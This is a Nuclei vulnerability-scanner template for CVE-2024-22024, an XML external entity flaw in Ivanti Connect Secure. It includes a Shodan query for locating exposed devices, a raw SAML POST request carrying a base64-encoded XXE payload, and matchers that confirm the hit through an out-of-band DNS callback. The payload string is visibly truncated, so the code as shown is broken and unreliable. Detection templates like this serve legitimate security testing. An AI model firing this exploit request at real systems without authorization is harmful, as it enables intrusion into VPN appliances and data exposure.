id: CVE-2024-22024 info: name: Ivanti Connect Secure - XXE author: watchTowr severity: high description: | Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection. impact: | Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or remote code execution. remediation: | Apply the latest security patches or updates provided by Ivanti to fix the XXE vulnerability. reference: - https://labs.watchtowr.com/are-we-now-part-of-ivanti/ - https://twitter.com/h4x0r_dz/status/1755849867149103106/photo/1 metadata: max-request: 1 vendor: ivanti product: "connect_secure" shodan-query: "html:\"welcome.cgi?p=logo\"" tags: cve,cve2024,kev,xxe,ivanti variables: payload: ' %watchTowr;]>' http: - raw: - | POST /dana-na/auth/saml-sso.cgi HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded SAMLRequest={{base64(payload)}} matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: word part: body words: - '/dana-na/' - 'WriteCSS' condition: and # digest: 490a0046304402206a39800bff0d9ca85a05e3686a0e246f8d5504a38e8501a1d7e8684ae6f2853002205ba7c74bb1f99cacf693e8a5a1cd429dcd7e52fab188beb8c95b934e4aabcd57:922c64590222798bb761d5b6d8e72950